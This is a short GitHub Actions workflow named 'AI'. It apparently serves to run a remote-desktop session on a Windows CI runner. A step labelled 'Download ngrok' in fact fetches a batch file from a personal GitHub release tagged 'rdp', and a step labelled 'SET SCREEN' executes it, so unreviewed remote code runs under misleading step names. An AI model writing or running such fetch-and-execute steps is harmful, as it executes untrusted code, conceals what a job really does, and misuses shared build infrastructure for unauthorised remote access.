name: AI
on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 45

    steps:

    - name: Download ngrok
      run: |
        Invoke-WebRequest https://github.com/bhupi0723/data/releases/download/rdp/site.bat -OutFile site.bat


    - name: SET SCREEN
      run: cmd /c site.bat


